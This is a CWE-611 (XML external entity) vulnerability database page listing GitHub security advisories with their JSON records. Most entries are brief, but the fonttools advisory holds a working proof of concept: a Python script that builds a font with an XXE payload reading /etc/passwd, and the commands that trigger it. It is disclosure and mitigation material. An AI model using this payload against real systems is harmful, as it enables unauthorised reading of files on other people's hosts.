CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1694 vulnerabilities reference this CWE, most recent first.
GHSA-63VX-FX7J-2X6P
Vulnerability from github – Published: 2023-10-02 06:30 – Updated: 2024-04-04 07:59FD Application Apr. 2022 Edition (Version 9.01) and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
{
"affected": [],
"aliases": [
"CVE-2023-42132"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-02T05:15:26Z",
"severity": "MODERATE"
},
"details": "FD Application Apr. 2022 Edition (Version 9.01) and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.",
"id": "GHSA-63vx-fx7j-2x6p",
"modified": "2024-04-04T07:59:54Z",
"published": "2023-10-02T06:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42132"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN39596244"
},
{
"type": "WEB",
"url": "https://web.fd-shinsei.mhlw.go.jp/download/software/index.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-649W-VM59-W5HC
Vulnerability from github – Published: 2022-05-24 16:54 – Updated: 2023-01-31 21:30IBM Intelligent Operations Center V5.1.0 through V5.2.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 162737.
{
"affected": [],
"aliases": [
"CVE-2019-4419"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-20T19:15:00Z",
"severity": "HIGH"
},
"details": "IBM Intelligent Operations Center V5.1.0 through V5.2.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 162737.",
"id": "GHSA-649w-vm59-w5hc",
"modified": "2023-01-31T21:30:18Z",
"published": "2022-05-24T16:54:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4419"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162737"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10956433"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-64F2-MH2M-9CJ7
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2024-04-04 03:06An XML External Entities (XXE)vulnerability in Callback Assist could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The affected versions of Callback Assist includes all 4.0.x versions before 4.7.1.1 Patch 7.
{
"affected": [],
"aliases": [
"CVE-2020-7036"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-23T21:15:00Z",
"severity": "MODERATE"
},
"details": "An XML External Entities (XXE)vulnerability in Callback Assist could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The affected versions of Callback Assist includes all 4.0.x versions before 4.7.1.1 Patch 7.",
"id": "GHSA-64f2-mh2m-9cj7",
"modified": "2024-04-04T03:06:26Z",
"published": "2022-05-24T17:48:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7036"
},
{
"type": "WEB",
"url": "https://downloads.avaya.com/css/P8/documents/101075450"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-64VQ-Q588-GMPM
Vulnerability from github – Published: 2022-06-18 00:00 – Updated: 2022-06-28 00:00ASG technologies ( A Rocket Software Company) ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to XML External Entity (XXE).
{
"affected": [],
"aliases": [
"CVE-2021-45024"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-17T13:15:00Z",
"severity": "CRITICAL"
},
"details": "ASG technologies ( A Rocket Software Company) ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to XML External Entity (XXE).",
"id": "GHSA-64vq-q588-gmpm",
"modified": "2022-06-28T00:00:43Z",
"published": "2022-06-18T00:00:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45024"
},
{
"type": "WEB",
"url": "https://docs.rocketsoftware.com/bundle/ven1649700711249/page/ayk1652945111726.html"
},
{
"type": "WEB",
"url": "http://asg-zena.com"
},
{
"type": "WEB",
"url": "http://asg.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-64W9-4FPR-W9XW
Vulnerability from github – Published: 2022-05-24 17:39 – Updated: 2022-05-24 17:39XML External Entity Injection vulnerability in Micro Focus Application Lifecycle Management (Previously known as Quality Center) product. The vulnerability affects versions 12.x, 12.60 Patch 5 and earlier, 15.0.1 Patch 2 and earlier and 15.5. The vulnerability could be exploited to allow an XML External Entity Injection.
{
"affected": [],
"aliases": [
"CVE-2021-22498"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-19T16:15:00Z",
"severity": "HIGH"
},
"details": "XML External Entity Injection vulnerability in Micro Focus Application Lifecycle Management (Previously known as Quality Center) product. The vulnerability affects versions 12.x, 12.60 Patch 5 and earlier, 15.0.1 Patch 2 and earlier and 15.5. The vulnerability could be exploited to allow an XML External Entity Injection.",
"id": "GHSA-64w9-4fpr-w9xw",
"modified": "2022-05-24T17:39:29Z",
"published": "2022-05-24T17:39:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22498"
},
{
"type": "WEB",
"url": "https://softwaresupport.softwaregrp.com/doc/KM03771781"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-65VM-7C4G-83VM
Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2024-04-04 02:39SAS XML Mapper 9.45 has an XML External Entity (XXE) vulnerability that can be leveraged by malicious attackers in multiple ways. Examples are Local File Reading, Out Of Band File Exfiltration, Server Side Request Forgery, and/or Potential Denial of Service attacks. This vulnerability also affects the XMLV2 LIBNAME engine when the AUTOMAP option is used.
{
"affected": [],
"aliases": [
"CVE-2019-14678"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-11-14T21:15:00Z",
"severity": "CRITICAL"
},
"details": "SAS XML Mapper 9.45 has an XML External Entity (XXE) vulnerability that can be leveraged by malicious attackers in multiple ways. Examples are Local File Reading, Out Of Band File Exfiltration, Server Side Request Forgery, and/or Potential Denial of Service attacks. This vulnerability also affects the XMLV2 LIBNAME engine when the AUTOMAP option is used.",
"id": "GHSA-65vm-7c4g-83vm",
"modified": "2024-04-04T02:39:43Z",
"published": "2022-05-24T17:00:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14678"
},
{
"type": "WEB",
"url": "https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14678-Unsafe%20XML%20Parsing-SAS%20XML%20Mapper"
},
{
"type": "WEB",
"url": "http://support.sas.com/kb/64/719.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-666P-V2MJ-CXRF
Vulnerability from github – Published: 2022-08-16 00:00 – Updated: 2022-08-17 00:00Out-of-Band XML External Entity (OOB-XXE) vulnerability in Zoho ManageEngine Analytics Plus before 4.3.5 allows remote attackers to read arbitrary files, enumerate folders and scan internal ports via crafted XML license file.
{
"affected": [],
"aliases": [
"CVE-2020-21641"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-15T20:15:00Z",
"severity": "HIGH"
},
"details": "Out-of-Band XML External Entity (OOB-XXE) vulnerability in Zoho ManageEngine Analytics Plus before 4.3.5 allows remote attackers to read arbitrary files, enumerate folders and scan internal ports via crafted XML license file.",
"id": "GHSA-666p-v2mj-cxrf",
"modified": "2022-08-17T00:00:22Z",
"published": "2022-08-16T00:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-21641"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/analytics-plus/release-notes.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6673-4983-2VX5
Vulnerability from github – Published: 2024-01-09 16:01 – Updated: 2024-05-02 13:09Summary
As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.
This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.
PoC
The vulnerability can be reproduced following the bellow steps on a unix based system.
- Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised
/etc/passwdfor our POC file to include and modified an existing subset integration test to build the POC font - see bellow.
from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable
XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<g id="glyph1">
<text font-size="10" x="0" y="10">&test;</text>
</g>
</svg>
"""
def main():
# generate a random TTF font with an SVG table
glyph_order = [".notdef"] + list(ascii_letters)
pen = TTGlyphPen(glyphSet=None)
pen.moveTo((0, 0))
pen.lineTo((0, 500))
pen.lineTo((500, 500))
pen.lineTo((500, 0))
pen.closePath()
glyph = pen.glyph()
glyphs = {g: glyph for g in glyph_order}
fb = FontBuilder(unitsPerEm=1024, isTTF=True)
fb.setupGlyphOrder(glyph_order)
fb.setupCharacterMap({ord(c): c for c in ascii_letters})
fb.setupGlyf(glyphs)
fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
fb.setupHorizontalHeader()
fb.setupOS2()
fb.setupPost()
fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})
svg_table = newTable("SVG ")
svg_table.docList = [
(XXE_SVG, 1, 12)
]
fb.font["SVG "] = svg_table
fb.font.save('poc-payload.ttf')
if __name__ == '__main__':
main()
- Subset the font with an affected version of fontTools - we tested on
fonttools==4.42.1andfonttools==4.28.2- using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):
pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
- Read the parsed SVG table in the subsetted font:
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx
Observed the included contents of the /etc/passwd file.
Impact
Note the final severity is dependant on the environment fontTools is running in.
- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on
Possible Mitigations
There may be other ways to mitigate the issue, but some suggestions:
- Set the
resolve_entities=Falseflag on parsing methods - Consider further methods of disallowing doctype declarations
- Consider recursive regex matching
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "fonttools"
},
"ranges": [
{
"events": [
{
"introduced": "4.28.2"
},
{
"fixed": "4.43.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-45139"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-09T16:01:10Z",
"nvd_published_at": "2024-01-10T16:15:46Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAs of `fonttools\u003e=4.28.2` the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. \n\nThis allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. \n\n### PoC\n\n\nThe vulnerability can be reproduced following the bellow steps on a unix based system.\n\n1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised `/etc/passwd` for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.\n\n```python\n\nfrom string import ascii_letters\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\nfrom fontTools.ttLib import newTable\n\n\nXXE_SVG = \"\"\"\\\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE svg [\u003c!ENTITY test SYSTEM \u0027file:///etc/passwd\u0027\u003e]\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n \u003cg id=\"glyph1\"\u003e\n \u003ctext font-size=\"10\" x=\"0\" y=\"10\"\u003e\u0026test;\u003c/text\u003e\n \u003c/g\u003e\n\u003c/svg\u003e\n\"\"\"\n\ndef main():\n # generate a random TTF font with an SVG table\n glyph_order = [\".notdef\"] + list(ascii_letters)\n pen = TTGlyphPen(glyphSet=None)\n pen.moveTo((0, 0))\n pen.lineTo((0, 500))\n pen.lineTo((500, 500))\n pen.lineTo((500, 0))\n pen.closePath()\n glyph = pen.glyph()\n glyphs = {g: glyph for g in glyph_order}\n\n fb = FontBuilder(unitsPerEm=1024, isTTF=True)\n fb.setupGlyphOrder(glyph_order)\n fb.setupCharacterMap({ord(c): c for c in ascii_letters})\n fb.setupGlyf(glyphs)\n fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})\n fb.setupHorizontalHeader()\n fb.setupOS2()\n fb.setupPost()\n fb.setupNameTable({\"familyName\": \"TestSVG\", \"styleName\": \"Regular\"})\n\n svg_table = newTable(\"SVG \")\n svg_table.docList = [\n (XXE_SVG, 1, 12)\n ]\n fb.font[\"SVG \"] = svg_table\n\n fb.font.save(\u0027poc-payload.ttf\u0027)\n\nif __name__ == \u0027__main__\u0027:\n main()\n\n```\n\n2. Subset the font with an affected version of fontTools - we tested on `fonttools==4.42.1` and `fonttools==4.28.2` - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):\n\n```shell\npyftsubset poc-payload.ttf --output-file=\"poc-payload.subset.ttf\" --unicodes=\"*\" --ignore-missing-glyphs\n```\n\n3. Read the parsed SVG table in the subsetted font:\n\n```shell\nttx -t SVG poc-payload.subset.ttf \u0026\u0026 cat poc-payload.subset.ttx\n```\n\nObserved the included contents of the `/etc/passwd` file. \n\n### Impact\n\nNote the final severity is dependant on the environment fontTools is running in.\n\n- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on\n\n\n\n### Possible Mitigations \n\nThere may be other ways to mitigate the issue, but some suggestions:\n\n1. Set the `resolve_entities=False` flag on parsing methods\n2. Consider further methods of disallowing doctype declarations\n3. Consider recursive regex matching\n\n",
"id": "GHSA-6673-4983-2vx5",
"modified": "2024-05-02T13:09:24Z",
"published": "2024-01-09T16:01:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45139"
},
{
"type": "WEB",
"url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
},
{
"type": "PACKAGE",
"url": "https://github.com/fonttools/fonttools"
},
{
"type": "WEB",
"url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "fonttools XML External Entity Injection (XXE) Vulnerability"
}
GHSA-66CJ-JQWQ-X892
Vulnerability from github – Published: 2026-07-17 15:32 – Updated: 2026-07-17 18:31libpvestorage-perl v9.1.1 and libpve-storage-perl v8.3.7 were discovered to contain an XML External Entity (XXE) vulnerability.
{
"affected": [],
"aliases": [
"CVE-2026-51080"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-17T14:17:24Z",
"severity": "CRITICAL"
},
"details": "libpvestorage-perl v9.1.1 and libpve-storage-perl v8.3.7 were discovered to contain an XML External Entity (XXE) vulnerability.",
"id": "GHSA-66cj-jqwq-x892",
"modified": "2026-07-17T18:31:24Z",
"published": "2026-07-17T15:32:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-51080"
},
{
"type": "WEB",
"url": "https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/post-849970"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-66M4-PHC4-4X75
Vulnerability from github – Published: 2022-05-05 00:00 – Updated: 2022-05-12 00:00Multiple vulnerabilities in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an attacker to escape from the guest virtual machine (VM) to the host machine, inject commands that execute at the root level, or leak system data from the host to the VM. For more information about these vulnerabilities, see the Details section of this advisory.
{
"affected": [],
"aliases": [
"CVE-2022-20780"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-04T17:15:00Z",
"severity": "HIGH"
},
"details": "Multiple vulnerabilities in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an attacker to escape from the guest virtual machine (VM) to the host machine, inject commands that execute at the root level, or leak system data from the host to the VM. For more information about these vulnerabilities, see the Details section of this advisory.",
"id": "GHSA-66m4-phc4-4x75",
"modified": "2022-05-12T00:00:34Z",
"published": "2022-05-05T00:00:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/orangecertcc/security-research/security/advisories/GHSA-hrpq-384f-vrpg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20780"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.